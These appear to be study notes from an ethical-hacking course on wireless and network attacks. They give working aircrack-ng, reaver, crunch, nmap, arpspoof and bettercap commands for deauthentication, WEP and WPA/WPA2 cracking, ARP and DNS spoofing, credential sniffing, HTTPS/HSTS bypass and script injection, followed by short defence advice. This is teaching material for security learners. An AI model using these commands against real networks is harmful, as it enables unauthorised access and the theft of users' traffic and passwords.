Network Hacking¶
Intro¶
Pre-connection attacks
gaining access
Post-connection attacks
What is a MAC Address?¶
Media Access Control
Permanent
Physical
Unique
Assigned by manufacturer
Why Change the MAC Address?¶
Increase anonymity
Impersonate other devices
Bypass filters
Changing the MAC Address¶
ifconfig wlan0 down
ifconfig wlan0 hw ether 00:11:22:33:44:55
Wireless Modes¶
iwconfig
ifconfig wlan0 down
airmon-ng check kill
iwconfig wlan0 mode monitor
iwconfig
Pre-Connection Attacks¶
Packet Sniffing¶
Using airodump-ng
Part of the aircrack-ng suit
Airodump-ng is a packet sniffer
Used to capture all packets within range
Display detailed info about networks around us
Connected clients etc.
airodump-ng [MonitorModeInterface]
WiFi Bands¶
Decides the frequency range that can be used
Determines the channels that can be used
Clients need to support band used by router to communicate with it.
Data can be sniffed from a certain band if the wireless adapter used supports that band
Most common wifi bands are:
a - uses 5Ghz frequency only
b, g - uses 2.4Ghz frequency only
n - uses 5 and 2.4 Ghz
ac - uses frequencies lower than 6 Ghz
airodump-ng --band a mon0
airodump-ng --band abg mon0
Targeted Packet Sniffing¶
airodump-ng --bssid F8:23:B2:B9:50:A8 --channel 2 --write test mon0
Deauthentication Attack¶
Disconnect any client from any network
Works on encrypted networks (WEP, WPA, & WPA2)
No need to know the network key
No need to connect to the network
aireplay-ng --dauth [#DeauthPackets] -a [NetworkMac] -c [TargetMac] [Interface]
Gaining Access - WEP Cracking¶
Theory Behind Cracking WEP Encryption¶
Wired Equivalent Privacy
Old encryption
Uses an algorithm called RC4
Still used in some networks
Can be cracked easily
WEP Cracking
Client encrypts data using a key
Encrypted packet sent in the air
Router decrypts packet using the key
Each packet is encrypted using a unique key stream
Random initialization vector (IV) is used to geenrate the keys streams
The IV is only 24 bits
IV + Key (Password ) = key stream
IV is too small (only 24 bits)
IV is sent in plain text
Result:
IVs will repeat on busy networks
This makes WEP vulnerable to statistical attacks
Repeated IVs can be used to determine the key stream
and break the encryption
WEP Cracking Basics¶
Conclusion:
To crack WEP we need to:
capture a large number of packets/IVs - using airodump-ng
Analyse the captured IVs and crack the key - using aircrack-ng
airodump-ng --bssid 00:11:22:33:44:55 --channel 1 --write basic_wep mon0
aircrack-ng basic_wep-01.cap
# Take the key found in brackets [ 41:73:32:33:70 ] or whatever and connect to wifi using the key minus the colons
Fake Authentication Attack¶
Problem:
If network is not busy
It would take some time to capture enough IVs
Solution:
Force the AP to generate new IVs
Problem:
APs only communicate with connected clients.
We cant communicate with it
We cant even start the attack
Solution:
Associate with the AP before launcing the attack
airodump-ng --bssid 00:11:22:33:44:55 --channel 6 --write arpreplay mon0
aireplay-ng --fakeauth 0 -a [targetAPMac] -h [MyMacAddressFirst8DigitsofUnspec] mon0
ARP Request Replay Attack¶
Wait for an ARP packet
Capture it, and replay it (retransmit it)
THis causes the AP to produce another packet with net IV
Keep doing this till we have enough IVs to crack the key
airodump-ng --bssid 00:11:22:33:44:55 --channel 6 --write arpreplay mon0
aireplay-ng --fakeauth 0 -a [targetAPMac] -h [MyMacAddressFirst8DigitsofUnspec] mon0
aireplay-ng --arpreplay -b [targetAPMac] -h [MyMacAddressFirst8DigitsofUnspec] mon0
aireplay-ng --fakeauth 0 -a [targetAPMac] -h [MyMacAddressFirst8DigitsofUnspec] mon0
aircrack-ng arpreplay-01.cap
Gaining Access - WPA/WPA2 Cracking¶
Intro¶
Both can be cracked using the same methods
Made to address the issues in WEP
Much more secure
Each packet is encrypted using a unique temporary key
Packets contain no useful information
WPS is a feature that can be used with WPA & WPA2
Allows client to connect without the password
Authentication is done using an 8 digit pin
8 digits is very small
We can try all possible pins in relatively short time
Then the WPS pin can be used to compute the actual password
PS. this only works if the router is configured not to use PBC (Push Button Authentication)
Hacking WPA & WPA2 Without a Wordlist¶
# Discover WPS networks
wash --interface mon0
# Run reaver
reaver -bssid 00:11:22:33:44:55 --channel 1 --interface mon0 -vvv --no-associate
# Then do the auth attack
airplay-ng --fakeauth 30 -a [targetRouterMAC] -h [myMACAddress] mon0
Capturing the Handshake¶
WPA fixed all weaknesses in WEP
Packets contain no useful data
Only packets that can aid with the cracking process are the handshake packets
These are 4 packets sent when a client connects to the network
# Run airodump as usual to get the BSSID and channel
# Then run airodump again
airodmp-ng --bssid 00:11:22:33:44:55 --channel 1 --write wpa_handshake mon0
# Wait for a device to connect or do a deauth attack to disconnect a client to get it to connect again to capture handshake packets
aireplay-ng --deauth 4 -a 00:11:22:33:44:55 -c [clientsMACAddress] mon0
Creating a Wordlist¶
The handshake does not contain data that helps recover the key
It contains data that can be used to check if a key is valid or not
Crunch can be used to create a wordlist
Syntax: crunch [min] [max] [characters] -t [pattern] -o [filename]
Example: crunch 6 8 123abc$ -o wordlist -t a@@@@b
Generated passwords:
aaaaab
aabbbb
aan$$b
Links to wordlists
Cracking WPA & WPA2 Using a Wordlist Attack¶
aircrack-ng wpa_handshake-01.cap -w test.txt
Gaining Access - Security¶
Securing Your Network From Hackers¶
Now that we know how to test the security of all known wireless encryptions (WEP/WPA/WPA2), it is relatively easy to secure our networks against these attacks as we know all the weaknesses that can be used by hackers to crack these encryptions.
So lets have a look on each of these encryptions one by one:
WEP: WEP is an old encryption, and its really weak, as we seen in the course there are a number of methods that can be used to crack this encryption regardless of the strength of the password and even if there is nobody connected to the network. These attacks are possible because of the way WEP works, we discussed the weakness of WEP and how it can be used to crack it, some of these methods even allow you to crack the key in a few minutes.
WPA/WPA2: WPA and WPA2 are very similar, the only difference between them is the algorithm used to encrypt the information but both encryptions work in the same way. WPA/WPA2 can be cracked in two ways
If WPS feature is enabled then there is a high chance of obtaining the key regardless of its complexity, this can be done by exploiting a weakness in the WPS feature. WPS is used to allow users to connect to their wireless network without entering the key, this is done by pressing a WPS button on both the router and the device that they want to connect, the authentication works using an eight digit pin, hackers can brute force this pin in relatively short time (in an average of 10 hours), once they get the right pin they can use a tool called reaver to reverse engineer the pin and get the key, this is all possible due to the fact that the WPS feature uses an easy pin (only 8 characters and only contains digits), so its not a weakness in WPA/WPA2, its a weakness in a feature that can be enabled on routers that use WPA/WPA2 which can be exploited to get the actual WPA/WPA2 key.
If WPS is not enabled, then the only way to crack WPA/WPA2 is using a dictionary attack, in this attack a list of passwords (dictionary) is compared against a file (handshake file) to check if any of the passwords is the actual key for the network, so if the password does not exist in the wordlist then the attacker will not be able to find the password.
Conclusion:
Do not use WEP encryption, as we seen how easy it is to crack it regardless of the complexity of the password and even if there is nobody connected to the network.
Use WPA2 with a complex password, make sure the password contains small letters, capital letters, symbols and numbers and;
Ensure that the WPS feature is disabled as it can be used to crack your complex WPA2 key by brute-forcing the easy WPS pin.
Post Connection Attacks - Information Gathering¶
Discover all devices on the network
Display their
IP Address
MAC Address
OS
Open ports
Running services
Etc.
netdiscover -r 10.0.2.1/24
Network Mapping¶
HUGE security scanner
From an IP/IP range it can discover
Open ports
Running services
Operating system
Connected clients
Etc.
# You can also use the tool Zenmap
nmap -T4 -A -v 192.168.1.1/24
nmap -T4 -F 192.168.1.1/24
nmap -sV -T4 -O -F --version-light 192.168.1.1/24
Post Connection Attacks - MiTM¶
ARP Poisoning¶
Address Resolution Protocol
Simple protocol used to map IP Addresses of a machine to its MAC Address
Why ARP spoofing is possible
Client accept responses even if they did not send a request
Clients trust responses without any form or verification
Intercepting Network Traffic¶
Arpspoof
arpspoof tool to run arp spoofing attacks
Simple and reliable
Ported to most operating systems including Android and iOS
Usage is always the same
Usage:
arpspoof -i [interface] -t [clientIP] [gatewayIP]
arpspoof -i [interface] -t [gatewayIP] [clientIP]
# Enable ip forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
Bettercap Basics¶
Framework to run network attacks
Can be used to
ARP Spoof targets (redirect the flow of packets)
Sniff data (urls, usernam passwords)
Bypass HTTPS
Redirect domain requests (DNS spoofing)
Inject code into loaded pages
And more
usage: bettercap -iface [interface]
net.probe on
net.show
ARP Spoofing using Bettercap¶
set arp.spoof.fullduplex true
set arp.spoof.targets 10.0.2.7
arp.spoof on
Spying on Network Devices (Capturing Passwords, etc.)¶
net.sniff on
# go to http://vulnweb.com on the target
Creating Custom Spoofing Script¶
bettercap -iface eth0 -caplet spoof.cap
Bypass HTTPS¶
Problem:
Data in HTTP is sent as plain text
A MITM can read and edit requests and responses
Not secure
Solution:
Use HTTPS
HTTPS is an adaptation of HTTP
Encrypt HTTP using TLS or SSL
Problem:
Most websites use HTTPS
Data sniffed will be encrypted
Solution:
Downgrade HTTPS to HTTP
hstshijack/hstshijack
Bypassing HSTS¶
HSTS
HTTP Strict Transport Security
Used by Facebook, Twitter and few other famous websites
Problem:
Modern browsers are hard-coded to only load a list of HSTS websites over https
Solution:
Trick the browser into loading a different website
Replace all links for HSTS websites with similar links
Ex.
facebook.com -> facebook.corn
twitter.com -> twiter.com
# modify the hstshijack.cap file
Bypassing HSTS Recap¶
Examples |
Hacker Setup |
Firefox |
Chrome |
|
---|---|---|---|---|
HTTP HTTPS Preloaded HSTS |
vulnweb.com linkedin.com, winzip.com, stackoverflow.com, google.ie, netflix.com twitter.com, facebook.com, github.com |
Bettercap zSec custom Kali + Bettercap + HSTShijack zSec custom Kali + Bettercap + HSTShijack |
X X X |
X Website needs to be included in the HSTSHijack caplet Works if Secure DNS is disabled |
DNS Spoofing¶
bettercap -iface eth0 -caplet /root/spoof.cap
set dns.spoof.all true
set dns.spoof.domains zsecurity.org,*.zsecurity.org
dns.spoof on
Injecting Javascript Code¶
Bettercap Code Injection
Inject Javascript code in loaded pages
Code gets executed
This can be used to
Replace links
Replace images
Insert html elements
Hook target browser to exploitation frameworks
and more
Bettercap Web Interface¶
Web interface
More user-friendly
Requires more resources
And more modules
bettercap -iface eth0
ui.update
http-ui
# credentials
user, pass
Wireshark¶
Wireshark is a network protocol analyser
Designed to help network administrators to keep track of whats happening in their network
How it works
Logs packets taht flow through selected interface
Analyse all the packets
WHen we are the MITM, wireshark can be used to sniff and analyse traffic sent/received by targets
Detection & Security¶
ARP Spoofing¶
Why ARP Spoofing is possible:
clients accept responses even if they did not send a request
Clients trust response without any form of verification
Use xarp on Windows and Linux to detect arp poisoning
MITM Attacks¶
Detection:
Analysing arp tables
Using tools such as Xarp
Using wireshark
Problems:
Detection is not the same as prevention
Only works for ARP Spoofing.
Solution:
Encrypt traffic
HTTPS everywhere plugin
Using a VPN
Benefits of VPN:
Extra layer of encryption
More privacy & anonymity
Bypass censorship
Protection from hackers
Notes:
Use reputable VPN
Avoid free providers
Make sure they keep no logs
Use HTTPS everywhere